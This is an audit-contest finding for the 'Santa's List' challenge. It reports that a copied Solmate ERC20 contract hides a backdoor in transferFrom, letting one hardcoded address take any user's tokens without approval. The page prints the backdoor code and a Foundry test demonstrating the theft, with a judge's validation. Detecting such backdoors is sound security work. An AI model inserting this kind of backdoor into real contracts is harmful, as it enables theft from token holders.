First Flight #5: Santa's List

First Flight #5

Beginner FriendlyFoundry

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

SantaToken uses malicious ERC-20 implementation

wallebach

Summary

Malicious code was inserted into the original Solmate ERC20.sol file. This code allows an attacker to transfer tokens to themselves from other users' wallets.

Vulnerability Details

The following piece of code was injected into transferFrom function:

// hehehe :)

// https://arbiscan.io/tx/0xd0c8688c3bcabd0024c7a52dfd818f8eb656e9e8763d0177237d5beb70a0768d

if (msg.sender == 0x815F577F1c1bcE213c012f166744937C889DAF17) {

balanceOf[from] -= amount;

unchecked {

balanceOf[to] += amount;

}

emit Transfer(from, to, amount);

return true;

}

A test shows that the assumption about this kind of attack is correct:

function testMaliciousTransferFrom() public {

// SantaToken.mint() mints 1e18 tokens

uint256 expectedUserBalanceAfterMint = 1e18;

// Mint tokens for the user

vm.prank(address(santasList));

santaToken.mint(user);

// Verification that the correct number of tokens have been minted.

assertEq(santaToken.balanceOf(user), expectedUserBalanceAfterMint);

// Bad actor tries to steal user's tokens

address maliciousERC20Creator = 0x815F577F1c1bcE213c012f166744937C889DAF17;

vm.prank(maliciousERC20Creator);

santaToken.transferFrom(user, maliciousERC20Creator, expectedUserBalanceAfterMint);

// Attacker has obtained tokens from the user

assertEq(santaToken.balanceOf(maliciousERC20Creator), expectedUserBalanceAfterMint);

assertEq(santaToken.balanceOf(user), 0);

}

The message left on blockchain is decoded into "I am going to hack Santas Token!". The author of SantasList contract (see comment on line 55 of the file) has the same address as this bad actor.

Impact

High. The probability of rug pull is very high.

Tools Used

Manual check.

Recommendations

Remove malicious peace of code. Import dependencies from only from verified sources, e.g. from the official Solmate repository.

Updates

Lead Judging Commences

inallhonesty Lead Judge almost 2 years ago

Submission Judgement Published

Validated

Assigned finding tags:

unauthorized elf wallet approval in solmate-bad

Some sneaky elf has changed this library to a corrupted one where his wallet address skips all the approval checks for SantaToken! Shenanigans here - https://github.com/PatrickAlphaC/solmate-bad/blob/c3877e5571461c61293503f45fc00959fff4ebba/src/tokens/ERC20.sol#L88

Rewards breakdown

nSLOC

116

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.